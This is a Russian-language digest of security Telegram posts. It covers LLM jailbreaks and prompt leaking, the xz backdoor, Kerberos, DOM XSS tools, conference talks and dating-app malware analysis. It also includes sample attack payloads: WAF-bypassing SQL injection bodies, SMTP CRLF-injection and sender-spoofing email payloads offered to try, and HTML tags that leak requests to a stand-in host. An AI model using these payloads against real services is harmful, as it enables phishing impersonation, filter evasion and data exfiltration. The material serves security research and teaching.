🔒 #заметки #ai #offense

❓ Раз реакции больших языковых моделей на поступающие им запросы во многих случаях близки к привычному человеческому поведению, то, быть может, к ним применимы те же приёмы социальной инженерии, что и к нам? 🤔


➡️Мой коллега @Reworr_R написал статью о тестировании безопасности LLM с точки зрения задачи социальной инженерии: ⬇️


✨ DeteAct Blog: Социальная инженерия ИИ


Внутри упоминаются:

#️⃣Общие принципы
▪️Закон больших чисел
▪️Триггер скептицизма / "Burn the source"

#️⃣Джейлбрейки
▪️Автоматические (Token-level)
▪️Ручные (Prompt-level)
▪️Претекстинг

#️⃣Промпт-хакинг
▪️Кража инструкций (Prompt Leaking)
▪️Манипуляция поведением (Goal Hijacking)
▪️Избегание триггеров
▪️Коррекция ошибки


🔗Специализированные работы
▪️Теория истины по умолчанию Тимоти Р. Левина
▪️Труды Кевина Митника
▪️Актуальные исследования, научные статьи


// Время чтения: ~7 минут


@HaHacking  🐇

🐭 #события #offense

Бэкдор в утилите xz (CVE-2024-3094) – одна из самых громких новостей последних дней в сфере безопасности;

➖ CVSS: 😀
➖ Версии: 5.6.0 / 5.6.1
➖ RCE без следов в логах sshd
➖ Требуется приватный ключ злоумышленника

➡️Очевидно, что нужно откатываться к менее неприятным версиям, и на этом нам, как пользователям, можно было бы остановиться, но мне хочется разобраться в сути проблемы и в очередной раз обсудить тему человеческого фактора;

🧩 Everything I know about the xz backdoor ⚡️

   🧩  thesamesam/xz-backdoor ⚡️

🧩 Reported Supply Chain Compromise Affecting XZ Utils Data Compression Library, CVE-2024-3094 [CISA]

🧩 Frequently Asked Questions About CVE-2024-3094, A Backdoor in XZ Utils [Tenable]



❓) Что произошло?

  [💻]  Деобфусцированный код:   injected.txt
[✉️] Полное письмо с разбором:
‟backdoor in upstream xz/liblzma leading to ssh server compromise”

Andres Freund, разработчик из Microsoft, сообщил в рассылке oss-security об обнаружении бэкдора в утилите xz, который приводит к компрометации сервера SSH;

Специалист заметил:
🪲 Ошибки valgrind*
🪲 Увеличенное время логина по SSH
🪲 Увеличенное потребление CPU при логине по SSH
💻 А после – что TAR-архив xz, поставляемый через upstream репозиторий, содержал строку build-to-host.m4#L63, которой не было ни в upstream'ном build-to-host, ни на GitHub;

*К слову, ошибки valgrind были вызваны таким лэйаутом стека, который бэкдор не предусматривал, причём этот недочёт попытались исправить в версии xz 5.6.1;

Оказалось, что происходит инъекция обфусцированного скрипта, который извлёк другой специалист, Florian Weimer, и его исполнение по окончании конфигурации (при некоторых условиях**);

Деобфусцирвав код, специалисты выяснили, что он:

➖Перехватывает выполнение
➖Заменяет crc32_resolve() / crc64_resolve(), которые резолвятся при запуске sshd, на другой код, вызывающий _get_cpuid()
➖Производит проверки среды окружения
➖Парсит таблицы символов в памяти (основная причина замедления)
➖Устанавливает хук в динамический линковщик, ожидая резолва RSA_public_decrypt@...plt и заменяя его значение для указания на другой код бэкдора
➖Вызывает вредоносный код при логине по SSH с помощью ключа + продолжает нормальную аутентификацию

**Замеченные условия эксплуатации:
0️⃣ Детектируются некоторые дебаггеры (gdb, rr, ...)
1️⃣ x86-64 linux
2️⃣ Сборка с помощью gcc + gnu linker
3️⃣ Не установлена переменная окружения TERM
4️⃣ LD_BIND_NOT != 1
5️⃣ argv[0] = /usr/sbin/sshd
6️⃣ Не установлены LD_DEBUG, LD_PROFILE
7️⃣ Установлен LANG
8️⃣ yolAbejyiejuvnup != Evjtgvsh5okmkAvj‼️



❓) Как так вышло?

[2022]  Путь ко внедрению бэкдора начался приблизительно 2 года назад, когда основного разработчика, Lasse Collin, стали обвинять в медленном прогрессе. Пользователь Jigar Kumar настаивал на том, что xz срочно нужен новый мейнтейнер, ведь проект простаивает;

[2022]  Lasse Collin признался незнакомцу, что находится в трудном положении: ментальные проблемы, нехватка рук и ресурсов не дают ему и, следовательно, xz двигаться вперёд с требуемой скоростью, но в проект вносит вклад некий Jia Tan, который, возможно, получит более значимую роль в проекте;

  [✉️]  Полный ответ Lasse Collin для Jigar Kumar:
‟Re: [xz-devel] XZ for Java”

[2023] Jia Tan становится основным контактом вместо Lasse Collin в oss-fuzz – фаззере open source проектов от Google. Он коммитит инфраструктуру, которая будет использована в эскплойте в 2024 году. Автором числится некий Hans Jansen, который, судя по всему, был создан сугубо для этого коммита. Jia Tan создаёт пулл реквест в oss-fuzz, настаивая на отключении некоторых проверок, обуславливая это необходимостью xz в поддержке IFUNC;

[2024] Jia Tan изменяет ссылку на проект в oss-fuzz с tukaani.org/xz на xz.tukaani.org/xz-utils и коммитит последние штрихи для бэкдора;


Эта история – причина вспомнить и подумать о насущном:
▪️о ментальном здоровье
▪️об ответственности
▪️о прочих злободневных проблемах, особо острых для open source (анонимность, нехватка рук, ресурсов, мотивации, ...)

➡️Stay safe.

   @HaHacking  🐇

🐶 #заметки #infrastructure

➡️Объёмный материал по Kerberos, призванный обобщить информацию, разбросанную по Интернету, для эффективного погружения в тему; Включает в себя как теорию, так и практические примеры: ⬇️


🧩 ‟Kerberos простыми словами” (@yurystrozhevsky)


▪️Аутентификация между доменами
▪️Основы работы Kerberos
▪️Передача сообщений Kerberos (UDP / TCP)
▪️Сервисы в Kerberos
▪️Имена принципалов
▪️Типы делегирования
▪️Передача AP-REQ (LDAP / HTTP / SMB / RPC) 🦈
▪️. . .

💻 [👩‍💻 S4Uwhoami]: Реализация whoami на S4U
💻 [👩‍💻 XKERB]: Реализация библиотеки XKERB
💻 [👩‍💻 tools.h]: Реализация klist
💻 [👩‍💻 KerberosAES]: Реализация алгоритма шифрования Kerberos с AES


// Время чтения: ~50 минут


@HaHacking  🐇

📄  #инструменты #web

➡️Когда в уязвимости к XSS [ = в некорректной обработке пользовательского ввода ] виноват не сервер, а клиент – получаем DOM XSS;  А как получаем-то?


📕  [ LEARN ]  Что почитать? ‼️

   🧩  HackTricks:  DOM XSS
   🧩  PortSwigger:  DOM XSS
   🧩  DOM XSS Wiki


🧺  [ SCRAPE ]  Чем собрать JS код?
//  Что с source map? Как учесть фреймворки?

➖DevTools браузера
➖katana -headless
➖Selenium  / Playwright  / Puppeteer / PhantomJS / Crawlee

➖sourcemapper
➖unwebpack-sourcemap

➡️DevTools:  💻 React  / 👩‍💻 Vue  / 💻 Angular


🎲  [ DEOBFUSCATE ]  Чем деобфусцировать код?
//  Чем приводить к адекватному виду?

➖deobfuscate.io + obf-io.deobfuscate.io
➖lelinhtinh.github.io
➖jsnice.org
➖deobfuscate.relative.im
➖willnode.github.io

➡️js-beautify / 👩‍💻 Webcrack / 🖥 Humanify


💠  [ ANALYZE ]  Чем проводить анализ?

▪️{ SAST }  Semgrep + правила:  XSS / DOM-based XSS
▪️{ DAST }  Untrusted Types /  PostMessage tracker


🚀  [ MAGIC ]  А комбайны есть?

🔖 DOMDig – nodeJS скрипт для скана одностраничных веб-приложений внутри Chromium, рекурсивно краулит DOM и запускает event'ы. Возможна настройка сценария логина, прокси, произвольных заголовков, ...;

🔖 FindDOM-XSS – bash скрипт для поиска потенциальных уязвимостей к DOM XSS с использованием LinkFinder;

🔖 NoXSS – python скрипт для скана сайтов на Reflected / DOM-based XSS с использованием Chrome / PhantomJS;


😈  #инструменты

Что имеем в случае Burp Suite:
  ▪️DOM Invader ⚡️
  ▪️Burp Bounty

  ▪️DOM XSS Checks – пассивный скан DOM XSS;
  ▪️XSS Validator – автоматизация поиска + валидации уязвимости к XSS;
  ▪️Burp DOM Scanner – рекурсивный краулер и сканер для одностраничных веб-приложений;
  ▪️JavaScript Security – проверки на DOM XSS / проблемы целостности подресурсов (SRI) / по данным Threat Intelligence;

// 💬:  Огромное спасибо, @panyakor, за то, что когда-то сделал погружение в мир Client-Side уязвимостей чуть более безболезненным :)


   @HaHacking  🐇

🔍   #заметки #web #offense

➡️Ресерч о реализациях парсинга идентификатора зоны* адресов IPv6 в разных языках программирования и образующихся из этого возможностях эксплуатации приложений с конкретными примерами [🐍/💻/💻]: ⬇️


   🧩  ‟Exploring IPv6 Zone Identifier”  (@slonser_notes)


▪️Про ZoneID в IPv6 со ссылкой на RFC 6874
▪️Обход белого списка поддоменов
▪️Инъекция с обходом формата URL
▪️Инъекция произвольных команд для удаленного исполнения
▪️Инъекция CRLF-конструкций
▪️Внедрение XSS пейлоада
▪️Обход чёрного списка IP адресов
▪️Использование особенностей реализации для эксплуатации SSRF
▪️. . .

*Идентификатор зоны – часть IPv6 адреса, начиная со знака %, которая позволяет отличать link-local адреса и содержит идентификатор интерфейса;

▪️Пример адреса с ZoneID:  [fe80::1ff:fe23:4567:890a%eth2]
▪️Тоже пример адреса с ZoneID: [::1%slonser]

   @HaHacking  🐇

🗂 #заметки #web #offense

➡️Rather old, but gold информация, которая до сих пор пригождается при анализе защищённости веб-приложений;


   🧩  BlackFan/content-type-research

Манипуляция Content-Type для эксплуатации некорректного парсинга и, следовательно, для обхода WAF, внедрения полезной нагрузки для XSS и проведения CSRF;

Базовый пример идеи из репозитория:

Content-Type: application/x-www-form-urlencoded
Body: q=' union select '1

➡️ App:  ' union select 1'
➡️ WAF: ' union select 1'

Content-Type: application/json
Body: {"q":"' \u0075nion \u0073elect '1"}

➡️ App:  ' union select 1'
➡️ WAF: ' union select 1'

Content-Type: application/x-www-form-urlencoded;/json
Body: {"q":"' \u0075nion \u0073elect '1"}

➡️ App: ' union select 1'
➡️ WAF: {"q":"' \u0075nion \u0073elect '1"}

💻 BlackFan/content-type-research/ct-tricks – подобные трюки в зависимости от особенностей конкретной технологии;

💻 BlackFan/content-type-research/XSS – примеры Content-Type, которые могут быть использованы для внедрения полезной нагрузки для эксплуатации XSS;

💻 BlackFan/content-type-research/Browsers – примеры Content-Type, которые могут быть использованы для cross-origin запросов в зависимости от браузера;


   🧩  BlackFan/client-side-prototype-pollution

💻 BlackFan/client-side-prototype-pollution/pp – перечень технологий, уязвимых к Prototype Pollution, с указанием CVE, уязвимого фрагмента кода и PoC;

💻 BlackFan/client-side-prototype-pollution/gadgets – перечень гаджетов для списка технологий с указанием JS фингерпринта, уязвимого фрагмента кода и PoC;

//  Подобное от PortSwigger: XSS/Cheat-Sheet#Prototype Pollution

   @HaHacking  🐇

🟥 #мероприятия

Свершилось: появляется программа докладов киберфестиваля Positive Hack Days 2!

➡️Волей судьбы там оказались и мы со @slonser_notes с докладом ‟Вам письмо: старые новые атаки на почту”; 💮


❓) Что, где, когда?

🔗 Киберфестиваль Positive Hack Days 2
📍 Территория спортивного комплекса «Лужники»
📆 23 - 26 мая, 2024 г.

🚩 Трек "OFFENSE"
🕰 23 мая, 15:00 - 16:00 ⚡️


❓) Про что доклад?

Доклад о том, как старые неразрешённые вопросы реализации и клеймо "легаси" повлияли на уязвимость современной электронной почты к инъекциям. Разберём особенности работы почты и основных почтовых протоколов, рассмотрим виды инъекций в почтовую функциональность и вспомним громкие новости о возможности имперсонации, выявленной в крупных почтовых сервисах.

Вопрос защищённости почты остаётся актуальным в связи с повсеместным её использованием в современном мире. И всё же в данном вопросе на руку атакующим играют многие факторы, включая неразрешённые вопросы реализации почтовых элементов, проблему несогласованности между отдельными участниками сферы, а также незаинтересованность новых поколений специалистов в изучении "легаси";

Потому расскажем об устройстве электронной почты, об особенностях, следующих из её устройства, и об уязвимостях, которые вытекают из этих особенностей и даже находятся с нами в одной комнате;

➡️Надумаете прийти – обязательно берите с собой хорошее настроение, ничего более не потребуется; Всё, что нужно знать, Вы узнаете в ходе доклада! 💓

❓) Кто ещё в программе?

▪️[OFF] Антон Лопаницын, Passleak @webpwn
▪️[OFF] Вадим Шелест, Wildberries @purple_medved
▪️[DEF] Олег Скулкин, BI.ZONE Threat Intelligence
▪️[OFF] Павел Сорокин, Singleton Security @naryl_sec
▪️[OFF] Андрей Матвеенко, МТС RED @bh_cat
▪️[OFF] Пётр Уваров, VK
▪️[OFF] Виталий Болоховцев, СберАвто
▪️[OFF] Михаил Жмайло, Центр инноваций МТС Future Crew @RedTeambro

▪️И многие другие специалисты, доклады которых стоит посетить! Полный список➡️


➡️До скорых встреч!

   @HaHacking  🐇

🟥  #мероприятия #наработки #web #offense

➡️Большое спасибо всем, кто пришёл послушать наш доклад ‟Вам письмо: старые новые атаки на почту”! 🙇‍♂️


➕Дублирую ссылки на дополнительные материалы:

   🧩   ‟Email Attacks”  (@slonser_notes 🐘) ⚡️

   🧩   E-mail Injection
   🧩   qwqoro/Mail-Injection   [ 💻 / 💻 / 🐍 ]

➕Прикрепляю слайды презентации  ⬇️

   🧩   HaHacking_Вам-письмо.pdf
🧩 qwqoro/Mail-Injection/slides-PHDays.pdf

▪️Проблема №1: Некорректный парсинг адресов
▪️Проблема №2:  Недостаточная фильтрация специальных конструкций
▪️Проблема №3:  Несогласованность участников


➕Делюсь подборкой ссылок на смежные темы:

➖Hacktricks:  Email Injections
  ➖OWASP:  Testing for IMAP/SMTP Injection
  ➖VK9 SEC:  SMTP Injection Attack

  ➖SMTP Smuggling:  Блог
  ➖SMTP Smuggling:  Сайт
  ➖SMTP Smuggling:  Доклад 37C3

  ➖DEFCON:  SpamChannel, Spoofing Emails from 2M+ domains

Ну а киберфестиваль PHD2 продолжается, желаю всем приятного и полезного времяпрепровождения!

   @HaHacking  🐇

🟥  #мероприятия #заметки #offense #defense

➡️На YouTube канале Positive Events уже выкладываются записи докладов с прошедшего киберфестиваля PHDays 2; Представляю Вашему вниманию перечень докладов, запавших мне в сердце😊

🧩 Плейлист ‟Киберфестиваль PHDays 2”
🧩 Трансляция на сайте PHDays [ru/en]


🔥 OFFENSE

⭐️ ‟Вам письмо: старые новые атаки на почту”
(@hahacking 🐇 + @slonser_notes 🐘 )

Уязвимость современной электронной почты к инъекциям;

⭐️ ‟Учат в школе” (@webpwn 💣)

Поиск и эксплуатация уязвимостей в системах обучения хакеров;

⭐️ ‟Trust no one: red-teaming-инфраструктура на стероидах” (@purple_medved)

Создание архитектуры и администрирование инфраструктуры для проведения пентестов в формате red teaming, инструменты автоматизации malware development и развертывание атакующей инфраструктуры;

⭐️ ‟Регионы памяти, или Как я не туда шеллкод загрузил” (@RedTeambro)

О важности определения верного места для полезной нагрузки, о предотвращении множества детектов антивирусом и о том, как атакующему оставаться скрытым от глаз защитных средств;

⭐️ ‟Без лица: предъявите вашу кавычку”

Риски безопасности биометрических считывателей;

      ...


🔗 DEFENSE

⭐️ ‟Операция «Триангуляция»: почему не надо атаковать исследователей”

История о самой сложной цепочке атак и шпионском ПО, которые когда-либо были обнаружены специалистами «Лаборатории Касперского»;

⭐️ ‟Не самые типичные методы и инструменты, которые использовали злоумышленники в атаках на российские организации”

⭐️ ‟RCE-уязвимость в Managed ClickHouse глазами специалиста SOC в Yandex Cloud”

⭐️ ‟Было ваше — стало наше: что полезного можно найти на серверах злоумышленников”

   ⭐️  ‟SCA, или как правильно создавать и анализировать SBOM под каждый используемый язык”  (@bh_cat)

Мир управления зависимостями и безопасности открытого программного обеспечения;

...


Спасибо организаторам за организацию площадки, а докладчикам – за их труд и ценный вклад в сообщество!

➡️Приятного просмотра!

   @HaHacking  🐇

❔ #заметки #offense

➡️Дополнительно разберёмся в кейсах, описанных в статье @slonser_notes, и в извлекаемом из них импакте!

   🧩   ‟Old new email attacks”   [ 🐍 / 💻 / 💻 ]  ⚡️


📌 ГЛАВНЫЕ ПОИНТЫ

▪️Пробуйте общаться с почтовыми сервисами по SMTP:

Gmail:     smtp.gmail.com
Outlook:   smtp-mail.outlook.com
Yandex:    smtp.yandex.ru
Mail.Ru:   smtp.mail.ru
 ...

SSL port:  465
TLS port:  587

▪️Пробуйте разные входные точки:

From: EMAIL
From: <EMAIL>
From: "NAME" <EMAIL>
From: <EMAIL> (COMMENT)
From: GROUP: EMAIL, EMAIL
From: GROUP: <EMAIL>
Sender: EMAIL

▪️Оказались уязвимы почтовые продукты Google, Microsoft, Yandex, ...

▪️Оказались уязвимы парсеры адресов электронных почт, библиотеки ЯП:
    ▪️Python   [email]
    ▪️JS   [addressparser, email-addresses]
    ▪️C#   [System.Net.Mail]
    ▪️Go   [net/mail]
    ▪️Rust, Ruby, PHP, ...


🔑 ПЕЙЛОАДЫ НА ПРОБУ

...➡️...

attacker@[testText\r\nRSET\r\nMAIL FROM: <spoofed@example.org>\r\nRCPT TO: <victim@example.org>\r\nDATA\r\nFrom: spoofed@example.org\r\n\r\nText\r\n.\r\nQUIT\r\n]

📧➡️📧

"Spoofed"
<attacker@outlook.com>: spoofed@outlook.com

📧➡️📧, 📧, ...

<spoofed@gmail.com> "spoofed" <attacker@gmail.com>

📧➡️📧, 📧

Attacker
<spoofed@gmail.com>:<attacker@gmail.com>

📧➡️...

": <attacker@gmail.com> "<spoofed@gmail.com>"

☠️  ИМПАКТ & ПОСЛЕДСТВИЯ

▪️Возможность внедрения конструкции CRLF (\r\n) для внедрения SMTP команд➡️Имперсонация, ...
▪️Некорректный парсинг адреса электронной почты отправителя➡️Имперсонация

❗️Имперсонация➡️(в данном случае) Подделка адреса электронной почты отправителя; Обеспечивает кратное повышение легитимности фишинговых писем в глазах атакуемых

💬 Поскольку вендоры считают перечисленные уязвимости фичами, возможность эксплуатации сохраняет актуальность и уже сейчас мы можем наблюдать, как, например, этими "фичами" начинают пользоваться хактивисты для проведения качественных фишинговых рассылок;


➡️Stay safe.

   @HaHacking  🐇

💓 #мероприятия

➡️Напоследок, в завершение серии связанных постов, хотелось бы сказать пару неформальных слов о прошедшем Positive Hack Days 2; 💓

// Чек-лист:

✅ Пережила выступление, да ещё и в самодельном мерче (нарисовано руками краской для ткани, да)! 🔡
[🔗материалы тут ]

✅ Посетила множество крутых докладов (ещё раз спасибо организаторам за организацию, а докладчикам – за их труд и ценный вклад в сообщество!)
[🔗записи докладов тут ]

❌ Обрела новые знакомства, но увиделась не со всеми, с кем хотела увидеться☹️ (@castercanal, очень ждём в следующий раз!)

➕Огромное человеческое спасибо:

➖отдельное, особенное спасибо @slonser_notes, мне было приятно работать вместе с тобой! ты крутой!
➖владельцам каналов: @poxek, @nxblog, @SidneyJobChannel, @bh_cat, @pwnai, @wr3dmast3rvs, @hackthishit, @giftfromtherift, ...
➖Алексею, Андрею и Петру из VK
➖моим сокомандникам из ШкИБ Яндекса '23
➖всем тем, кто был на спикер-пати, на Похек Use After Party и/или на прочих наших посиделках
➖всем тем, кто слушал наш доклад / поддерживал нас / задавал вопросы / подходил пообщаться
➖ ...

💬 Спасибо за то, что сделали эту конференцию такой яркой и насыщенной! Правильно говорят, что человек красит место😊

Была рада познакомиться лично, увидеться и пообщаться со всеми вами!


➡️До новых встреч!

   @HaHacking  🐇

🥰 #наработки #defense #reverse #malware #web #mobile

➡️Любовь – это... на самом деле много что, но явно НЕ отправка своих стихов с целью получить удалённый контроль над его смартфоном; 🗝

// Я же упоминала, что мне пригодились полученные знания об анализе вредоносного ПО для Android? 🤔

Не секрет, что с каждым годом проблема одиночества становится всё острее и критичнее, причём настолько, что можно говорить о настоящей эпидемии и это, к сожалению, даже не станет преувеличением. Современное решение – интернет-знакомства, но где технологии – там и новые способы атаковать. Жаль, но злоумышленники обязательно воспользуются любой технической возможностью и сугубо человеческой уязвимостью для достижения своей цели. Чтобы взглянуть на ситуацию поближе, я создала Никиту;

Никите в приложении пришло следующее сообщение:

💬:  Привет) Впервые здесь и ещё не знаю что да как, давай пообщаемся в телеграме мой телеграм ****

💬  Завязался разговор, потом следующий, а в результате.. пришлось полистать вправо, заняться обратной разработкой, анализом вредоносного ПО, отправкой жалоб + написанием статьи:


🧩 ‟Свидание с фишингом и стилерами: киберпреступность в эпоху одиночества”

⬇️ HaHacking_Dating.pdf ⬇️


➡️Вместе подробно разберём деликатное, двигаясь от простого к сложному; В моём отчёте:

❌ Фишинговый сайт
❌ Мобильный стилер
❌ Мобильный RAT

❌ Прочие виды вредоносных экземпляров
❌ Статистика подобных атак


//   Время чтения: ~40 минут
➡️Enjoy!  🙇‍♂️

@HaHacking  🐇

🥰   #наработки #reverse #malware #web #mobile

➡️Краткое превью анализа вредоносных экземпляров, полная история изучения которых приводится в статье:

   🧩   ‟Свидание с фишингом и стилерами: киберпреступность в эпоху одиночества”

⬇️  HaHacking_Dating.pdf ⬇️



✉️ СИТУАЦИЯ №1 [PHISHING]

📍 Из чат-бота для знакомств
❓ Веб-приложение, "Драматический театр"
❗️ Фишинг с кражей платёжной информации

Обзор интерфейса сайта, который внушает пользователю иллюзию легитимности, и функциональности, которая обеспечивает сбор платёжной информации атакуемого;

// Тут же был обнаружен сюрприз – интерфейс по пути /generate, в котором любезно оставлена инструкция мошеннической схемы 🐇



💸 СИТУАЦИЯ №2 [STEALER]

📍 Из приложения для знакомств
❓ Мобильное приложение, "Знакомства 18+"
❗️ Стилер банковских SMS с элементами RAT и вымогательства

Извлечение из мобильного приложения, которое было создано с помощью Tasker, XML файла с данными и его импорт в Tasker в качестве проекта для комфортного изучения функциональности;

➖ Несколько режимов работы (стилер SMS и файлов, рассылка спама, шантаж, RAT)
➖ Триггер на банковские номера
➖ Обнаружение отладки и общение с C&C сервером
➖ Уведомления в Telegram боте
➖ . . .

💬 В отчёте показываю каждый вредоносный модуль и рассказываю, что это за (местный) зверь такой;



🐭 СИТУАЦИЯ №3 [RAT] ⚡️

📍 Из чат-бота для знакомств
❓ Мобильное приложение, "Стриминговый сервис"
❗️ RAT, удалённое управление заражённым устройством

Моё лучшее предположение, исходя из собранных данных, – что мне на анализ попался представитель CraxsRAT;

CraxsRAT представляет из себя наиболее свежего наследника CypherRAT, SpyNote и SpyMax. Он вобрал в себя многообразие функций, включая, например:
   ➖ Автозапуск
   ➖ Обнаружение отладки
   ➖ Управление файлами
   ➖ Управление камерой
➖ Управление микрофоном
➖ Управление SMS и звонками
➖ Отслеживание локации
   ➖ Управление прикосновениями
   ➖ Инъекции в WebView
   ➖ . . .

💬 В статье показываю образцы кода, отвечающие за каждую функцию, и рассказываю, что это за (иностранный) зверь такой;



🌳 ПРОЧИЕ СИТУАЦИИ

🔗 Другие варианты фишинга
🔗 Zscaler: ‟Album Stealer”➡️кража данных из браузеров
🔗 eSentire: ‟OnlyDcRatFans”➡️DcRAT
🔗 Zscaler: ‟Steal-It Campaign”➡️кража информации о системе



//   Читать полностью... 😥
➡️Enjoy! 

   @HaHacking  🐇

®️  #мероприятия #заметки #offense #defense #infrastructure #web #mobile #ai

➡️На канале OFFZONE в VK Видео выложили записи докладов с прошедшей конференции OFFZONE;  В этот раз список докладов, запавших мне в сердце, достаточно обширный, что не может не радовать😊 Рекомендую Вам к просмотру!

   🧩   Канал  ‟OFFZONE”



🎲  INFRASTRUCTURE

   ⭐️  ‟Pentest FreeIPA, или Углубляемся в зоопарк” (Михаил Сухов)

Внутреннее устройство FreeIPA и характерные уязвимости;

   ⭐️  ‟Вредоносное ПО и закрепление в системе: как злоумышленники взламывают Windows?”  (Жасулан Жусупов)

Нестандартные методы сохранения вредоносного ПО с помощью модификаций реестра и подмены DLL в Windows Internet Explorer, Win32 API Cryptography, Windows Troubleshooting, Microsoft Teams (исправлено в 2024 году) и Process Hacker 2 (исправлено в v3);

⚙️ HARDWARE

   ⭐️  ‟Угнать за 5 СМС: история об RCE в модемах Telit” (Александр Koзлов + Сергей Ануфриенко)

Уязвимости модемов Telit, позволяющие удаленно выполнить произвольный код, обход проверки цифровой подписи, активация Over The Air Provisioning (OTAP) и установка на модем собственного мидлета с привилегиями производителя;

   ⭐️  ‟MPoS'tor: компрометация мобильного PoS‑терминала”  (Георгий Хоруженко)

Анализ системы offline‑оплаты, метод удаленной компрометации мобильного терминала (посредством протокола Bluetooth) и перехват данных платежных карт пользователей;

💸  BUG BOUNTY

   ⭐️  ‟Больше никакой халявы! Интересные баги в e‑food‑приложениях”  (Егор Тахтаров)

Баги, найденные в программах вознаграждения у вендоров, основная сфера деятельности которых — e‑grocery;

   ⭐️  ‟Bug bounty: простые критические баги”  (Алексей Лямкин)

Как небольшие ошибки могут привести к критическим для бизнеса угрозам;

   ⭐️  ‟From source maps to secrets”  (@pentest_notes)

Разработчики все чаще стали оставлять открытые source maps в своих веб‑приложениях. Благодаря этому любой пользователь может просмотреть исходный код в его первозданном виде. Что же могло пойти не так?

💓  А ЕЩЁ

   ⭐️  [#MOBILE]  (@mobile_appsec_world)
‟Безопасность мобильных приложений: что нового в 2024 году?”

Наиболее значимые уязвимости и новости в мобильной безопасности: новые векторы атак, классные баги и ошибки, найденные в приложениях за последние полгода;

   ⭐️  [#AI]  (@hackthishit + Руслан Махмудов)
‟тRAGедия LLM. Эксплуатируем бэкдоры в базе знаний RAG”

Архитектура RAG в LLM, основные векторы атак через внедрение вредоносного документа и способ их оптимизации;

   ⭐️  ‟Pentester's tales”  (Михаил Дрягунов)

О звонках спамеров после посещения сайта, о расшифровке BitLocker с помощью логического анализатора, и о том, как получить RCE на кассе самообслуживания, просканировав пару штрихкодов;

      ...


💮  + HONORABLE MENTION

   ⭐️  ‟Гори, гори ясно, чтобы не погасло. Выгорание как тренд современной ИБ”  (🌚 @poxek + @bughunter_omsk)

   >💬 Я, признаться, не фанат разговоров "обо всём и ни о чём" и считаю, что техническая конференция должна состоять из технических докладов. Тем не менее, доклад Сергея и Артема, благодаря их настрою и выбранному формату открытого и искреннего диалога с залом, стал островком для отдыха в череде технохардкора, даже несмотря на то, что поднял не самую приятную тему для разговора. Ребята помогли задуматься о важной проблеме, не нагнетая и не уча, а просто поговорив по душам; Спасибо вам за то, что сделали это


И, конечно, спасибо организаторам и участникам OFFZONE за то, что он был таким!

➡️Приятного просмотра!

   @HaHacking  🐇

💎  #литература #заметки #infrastructure #offense #defense

➡️Если Вас интересует всё то, что относится к нижней половине модели OSI, у меня появился повод вспомнить про сети во всей их низкоуровневой красоте; ⚡️


📖 Мой хороший друг, высококлассный специалист @castercanal выпустил книгу, которая содержит 12 его работ для журнала @xakep_ru, дополняет серию материалов “Глазами хакера” и рассказывает о безопасности сетей;

     🧩   Caster:  “Сети глазами хакера”

[ ТЕМЫ ]:   Взлом DTP  /  Побег в другую сеть VLAN  /  Пентест канального уровня сети  /  Пентест Ethernet  /  Пентест сетей Cisco  /  Защита сетей от спуфинг-атак  /  Защита сетевого оборудования на примере Cisco IOS  /  Пентест MikroTik  /  Защита MikroTik  /  Использование провайдерских протоколов для пивотинга  /  Использование виртуального MikroTik для постэксплуатации Windows  /  Закаляем Kali Linux и не шумим в сети  /  Пентест сетей с наименьшим ущербом;

🔖 В честь этого прилагаю компиляцию полезных материалов по сетям, которая включает в себя ресурсы, созданные / рекомендованные автором книги для всех, кого интригуют сетевые технологии:  ⬇️

     🧩   casterbyte/NetworkNightmare — Mind map по атакам на сетевые протоколы;

Traffic Hijacking  /  MiTM Attacks  /  Dynamic IGP Routing  /  Configuration Exfiltration  /  DoS  /  NAC/802.1X Bypassing  /  GRE Pivoting  /  Cisco EEM for hiding user  /  Authentication Cracking  /  Information Gathering  /  Cisco Passwords  /  VLAN Bypassing;


     🧩   casterbyte/MITMonster — Cheat sheet по MITM-атакам;

▪️[L1]  Croc-in-the-middle  (@s0i37_channel)
▪️[L2]  ARP Cache Poisoning, LLMNR/NBT-NS/mDNS Poisoning, STP Root Spoofing, DHCPv4 Spoofing, DHCPv6 Spoofing;
▪️[L3]  Evil Twin against Dynamic Routing, FHRP Spoofing;


     🧩   “Курс молодого бойца”  (NetSkills)

[Cisco Packet Tracer]  Простейшая сеть  /  Коммутатор  /  Основы Cisco IOS  /  VLAN  /  STP  /  EtherChannel  /  L3 коммутатор  /  Маршрутизатор  /  Статическая маршрутизация  /  DHCP  /  NAT  /  OSPF  /  EIGRP  /  Access-List  /  Cisco ASA  /  DMZ  /  VPN  /  Syslog, NTP  /  AAA  /  TFTP  /  WiFi;


     🧩   Серия статей “СДСМ”  (LinkMeUp)

Коммутация  /  Статическая маршрутизация  /  STP  /  NAT и ACL  /  Динамическая маршрутизация  /  VPN  /  BGP и IP SLA  /  IBGP  /  Мультикаст  /  Базовый MPLS  /  MPLS L3VPN  /  MPLS L2VPN  /  MPLS EVPN  /  EVPN Multihoming  /  MPLS Traffic Engineering  /  Путь пакета  /  QoS  /  ECMP  /  Балансировка в датацентрах  /  Сети современных датацентров  /  Чипы и буферы;


     🧩   Материалы Сетевой академии Netacad  (Cisco)

Digital Essentials  /  Networking  /  Cybersecurity  /  Programmable Infrastructure  /  Packet Tracer;  [CCNA, CCNP] [#IoT]

➡️ Приятного чтения!

   @HaHacking  🐇

⚙️ #заметки #offense #web


➡️Cheat sheet по безопасности HTML5; (*от создателей DOMPurify)

   🧩 cure53/H5SC 💻 🧩 html5sec.org


▪️ [ html5sec.org/test/#<1...149> ]

Для каждого из почти 150 приведённых векторов XSS атак существует демо-стенд, где можно отредактировать полезную нагрузку➕понаблюдать за её поведением внутри iframe'ов с различными DTD (HTML5, HTML4, XHTML);

▪️ [ html5sec.org/test.<ext> ]

Примеры файлов, содержащих полезную нагрузку для вызова alert(1), со следующими расширениями:

asf, avi, class, css, dtd, eml, evt, gif, hlp, hta, htc, html, jar, js, json, mpeg, pdf, sct, noscript, swf, vbs, vml, wbxml, xbl, xdr, xml, xsl, xxe, zip

▪️vectors.txt➖ Словарь с примерами пейлоадов для каждого вектора XSS атаки;



➡️Список примеров HTML элементов, которые могут инициировать запросы к ресурсам; (*тоже от создателей DOMPurify)

Может быть полезен как памятка для составления полезной нагрузки для эксплуатации возможности внедрения HTML кода: для реализации OOB запросов и эксфильтрации данных;

Или как чеклист для проверки, как там поживает Ваша анонимность, ведь именно по такому принципу работают, например, пиксели-трекеры в электронных письмах🐇

   🧩 cure53/HTTPLeaks


▪️ vectors.txt➖ Список с примерами пейлоадов; Вот, например, несколько включений из него:

...
<img dynsrc="https://leaking.via/img-dynsrc">
<img lowsrc="https://leaking.via/img-lowsrc">
<video controls><source src="https://leaking.via/video-source-src" type="video/mp4"></video>
